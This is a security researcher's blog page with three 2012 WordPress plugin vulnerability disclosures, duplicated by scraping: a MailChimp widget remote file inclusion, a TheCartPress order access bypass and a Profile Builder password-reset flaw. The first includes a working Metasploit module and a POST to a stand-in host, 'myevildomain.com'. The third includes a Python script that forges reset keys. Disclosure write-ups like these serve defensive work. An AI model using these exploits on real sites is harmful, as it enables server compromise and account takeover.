ceriksen.com | Page 5

June 21, 2012 by Charlie Eriksen

WordPress Nmedia MailChimp widget “abs_path” remote file inclusion vulnerability

Analysis
This vulnerability is nothing but a textbook arbitrary file inclusion vulnerability. The file is used to interacting with the mailchimp API. But the very first 2 lines of executable code in /api_mailchimp/postToMailChimp.php, it goes ahead and accepts a path for loading a file.

$path = $_POST['abs_path'] . 'wp-load.php';
//echo $path; die;
require( $path );

$path = $_POST['abs_path'] . 'wp-load.php';

//echo $path; die;

require( $path );

By making following request, where the url has a file called ‘wp-load.php’ or otherwise will return php code, or using the proof of concept code, we can exploit this

POST /wordpress/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php
HTTP/1.1
Host: 192.168.80.130
Content-Type: application/x-www-form-urlencoded
Content-Length: 21

abs_path=http://myevildomain.com/

POST /wordpress/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php

HTTP/1.1

Host: 192.168.80.130

Content-Type: application/x-www-form-urlencoded

Content-Length: 21

abs_path=http://myevildomain.com/

Proof of concept code

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
    Rank = ExcellentRanking

    include Msf::Exploit::Remote::Tcp
    include Msf::Exploit::Remote::HttpClient
    include Msf::Exploit::Remote::HttpServer::PHPInclude

    def initialize(info = {})
        super(update_info(info,
            'Name'           => 'WordPress Nmedia MailChimp Widget "abs_path" Remote File Inclusion Vulnerability',
            'Description'    => %q{
                    This module exploits a remote file include execution vulnerability in the
                WordPress Nmedia MailChimp Widget '/api_mailchimp/postToMailChimp.php' script. 
                All versions of Nmedia MailChimp Widget up to and including 3.1 are vulnerable.
            },
            'Author'         => [ 'Charlie Eriksen' ],
            'License'        => MSF_LICENSE,
            'Version'        => '$Revision$',
            'References'     =>
                [
                    [ 'URL', 'http://secunia.com/advisories/49538/' ],
                ],
            'Privileged'     => false,
            'Payload'        =>
                {
                    'DisableNops' => true,
                    'Compat'      =>
                        {
                            'ConnectionType' => 'find',
                        },
                    # Arbitrary big number. The payload gets sent as an HTTP
                    # response body, so really it's unlimited
                    'Space'       => 262144, # 256k
                },
            'Platform'       => 'php',
            'Arch'           => ARCH_PHP,
            'Targets'        => [[ 'Automatic', { }]],
            'DisclosureDate' => 'Jun 21 2012',
            'DefaultTarget' => 0))

        register_options(
            [
                OptString.new('PHPURI', [ true , "The URI to request", '/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php']),
            ], self.class)
    end

    def php_exploit
        postdata = 'abs_path=' << php_include_url

        print_status("Sending exploit request...")
        response = send_request_raw({
            'global'  => true,
            'method'  => 'POST',
            'uri'     => datastore['PHPURI'],
            'data'    => postdata,
            'headers' =>
            {
                'Content-Type' => 'application/x-www-form-urlencoded',
                'Content-Length' => postdata.length,
            }
        })

        if response and response.code != 200
            print_error("Got a non-200 response back. The server may not be vulnerable (#{response.code})")
        end

        handler
    end

end

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = ExcellentRanking

include Msf::Exploit::Remote::Tcp

include Msf::Exploit::Remote::HttpClient

include Msf::Exploit::Remote::HttpServer::PHPInclude

def initialize(info = {})

super(update_info(info,

'Name' => 'WordPress Nmedia MailChimp Widget "abs_path" Remote File Inclusion Vulnerability',

'Description' => %q{

This module exploits a remote file include execution vulnerability in the

WordPress Nmedia MailChimp Widget '/api_mailchimp/postToMailChimp.php' script.

All versions of Nmedia MailChimp Widget up to and including 3.1 are vulnerable.

'Author' => [ 'Charlie Eriksen' ],

'License' => MSF_LICENSE,

'Version' => '$Revision$',

'References' =>

[

[ 'URL', 'http://secunia.com/advisories/49538/' ],

'Privileged' => false,

'Payload' =>

{

'DisableNops' => true,

'Compat' =>

{

'ConnectionType' => 'find',

# Arbitrary big number. The payload gets sent as an HTTP

# response body, so really it's unlimited

'Space' => 262144, # 256k

'Platform' => 'php',

'Arch' => ARCH_PHP,

'Targets' => [[ 'Automatic', { }]],

'DisclosureDate' => 'Jun 21 2012',

'DefaultTarget' => 0))

register_options(

[

OptString.new('PHPURI', [ true , "The URI to request", '/wp-content/plugins/nmedia-mailchimp-widget/api_mailchimp/postToMailChimp.php']),

], self.class)

end

def php_exploit

postdata = 'abs_path=' << php_include_url

print_status("Sending exploit request...")

response = send_request_raw({

'global' => true,

'method' => 'POST',

'uri' => datastore['PHPURI'],

'data' => postdata,

'headers' =>

{

'Content-Type' => 'application/x-www-form-urlencoded',

'Content-Length' => postdata.length,

}

})

if response and response.code != 200

print_error("Got a non-200 response back. The server may not be vulnerable (#{response.code})")

end

handler

end

June 20, 2012 by Charlie Eriksen

WordPress TheCartPress plugin order information security bypass

Advisory
Secunia Advisory SA 49652

Analysis
TheCartPress has functionality for an admin to view and print an order. This functionality extends also to the customer to print the order. By providing the orderID, the user can view and print the order. However there was a distinct lack of any validation about whether or not the user requesting the order owned it.

The entry point to print an order is /admin/PrintOrder.php:

$order_id  = isset( $_REQUEST['order_id'] ) ? $_REQUEST['order_id'] : 0;
$file_name  = 'tcp_print_order.php';
$template   = STYLESHEETPATH . '/' . $file_name;
$template   = apply_filters( 'tcp_get_print_order_template', $template, $order_id );
if ( file_exists( $template ) ) {
    include( $template );
} else {
    $template = get_template_directory() . '/' . $file_name;
    if ( STYLESHEETPATH != get_template_directory() && file_exists( $template ) ) {
        include( $template );
    } else {
        $template = TCP_THEMES_TEMPLATES_FOLDER . $file_name;
        if ( file_exists( $template ) ) {
            include( $template );
        }
    }
}

$order_id = isset( $_REQUEST['order_id'] ) ? $_REQUEST['order_id'] : 0;

$file_name = 'tcp_print_order.php';

$template = STYLESHEETPATH . '/' . $file_name;

$template = apply_filters( 'tcp_get_print_order_template', $template, $order_id );

if ( file_exists( $template ) ) {

include( $template );

} else {

$template = get_template_directory() . '/' . $file_name;

if ( STYLESHEETPATH != get_template_directory() && file_exists( $template ) ) {

include( $template );

} else {

$template = TCP_THEMES_TEMPLATES_FOLDER . $file_name;

if ( file_exists( $template ) ) {

include( $template );

}

This fetches the template that is going to be used to used for the page to be printed. By default, this is /theme-templates/tcp_print_order.php:

    if ( isset( $_REQUEST['order_id'] ) ) {
        require_once( TCP_CLASSES_FOLDER . 'OrderPage.class.php' );
        $order_id = $_REQUEST['order_id'];
        OrderPage::show( $order_id, true );
    }

if ( isset( $_REQUEST['order_id'] ) ) {

require_once( TCP_CLASSES_FOLDER . 'OrderPage.class.php' );

$order_id = $_REQUEST['order_id'];

OrderPage::show( $order_id, true );

}

The template goes ahead and passes on the order_id in the request to the OrderPage::show method. Notice that at no point has there been any validation of the order belonging to the user requesting the page. Anyway, we call into the show method, which is in fact the only method on the OrderPage class in /classes/OrderPage.class.php:

class OrderPage {

    static function show( $order_id, $see_comment = true, $echo = true, $see_address = true, $see_full = false ) {
        require_once( TCP_CLASSES_FOLDER . 'CartTable.class.php' );
        require_once( TCP_CLASSES_FOLDER . 'CartSourceDB.class.php' );
        $cart_table = new TCPCartTable( );
        return $cart_table->show( new TCP_CartSourceDB( $order_id, $see_address, $see_full, true, $see_comment ), $echo );
    }
}

class OrderPage {

static function show( $order_id, $see_comment = true, $echo = true, $see_address = true, $see_full = false ) {

require_once( TCP_CLASSES_FOLDER . 'CartTable.class.php' );

require_once( TCP_CLASSES_FOLDER . 'CartSourceDB.class.php' );

$cart_table = new TCPCartTable( );

return $cart_table->show( new TCP_CartSourceDB( $order_id, $see_address, $see_full, true, $see_comment ), $echo );

}

This method effectively just fetches the order from database, and then returns it. There’s no reference to the active user, which is the gist of this vulnerability. A lack of validation of the requesting user being also the owner of the order, or an admin.

May 23, 2012 by Charlie Eriksen

WordPress Profile Builder plugin vertical privilege escalation

Advisory
Secunia Advisory SA 49201

Analysis

Profile builder implemented its own password recovery system on top of the existing wordpress system in /front-end/wppb.recover.password.php. It does so by taking a request with a password reset key which is generated using a statically salted md5 hash of the user name, userID and two static strings, both computed when the password reset mail is send and then calculated again when the user accesses the link provided in the password reset mail.

//this is the part that handles the actual recovery
if (isset($_GET['submited']) && isset($_GET['loginName']) && isset($_GET['key'])){
    //get the login name and key and verify if they match the ones in the database
    $query = $wpdb->get_results( "SELECT * FROM $wpdb->users WHERE user_login='".$_GET['loginName']."'");
    $dbValue = $query[0]->user_activation_key;
    $id = $query[0]->ID;
    $localHashValue = md5($_GET['loginName'].'RMPBP'.$id.'PWRCVR');
    if ($localHashValue == $_GET['key']) {

//this is the part that handles the actual recovery

if (isset($_GET['submited']) && isset($_GET['loginName']) && isset($_GET['key'])){

//get the login name and key and verify if they match the ones in the database

$query = $wpdb->get_results( "SELECT * FROM $wpdb->users WHERE user_login='".$_GET['loginName']."'");

$dbValue = $query[0]->user_activation_key;

$id = $query[0]->ID;

$localHashValue = md5($_GET['loginName'].'RMPBP'.$id.'PWRCVR');

if ($localHashValue == $_GET['key']) {

As you can see, we fetch the userID associated with the provided user name, and then proceed to recalculate the hash and compare that against the key provided. If those match, you can now change the password.

Because this value is not at all random, it allows us to calculate this value for any user granted that we know the user name and user id(Which could easily be guessed for most sites by iterating through even a small sequenstial list of numbers), and subsequently change their password even if they did not request it, causing a vertical privilege escalation vulnerability.

Proof of concept code

import md5
m = md5.new()
userName = raw_input("Username:")
m.update(userName + "RMPBP" + raw_input("UserID:") + "PWRCVR")
print "&submited=yes&loginName=" + userName + "&key=" + str(m.hexdigest())
print "Submit the above to the querystring for the password recovery page

import md5

m = md5.new()

userName = raw_input("Username:")

m.update(userName + "RMPBP" + raw_input("UserID:") + "PWRCVR")

print "&submited=yes&loginName=" + userName + "&key=" + str(m.hexdigest())

print "Submit the above to the querystring for the password recovery page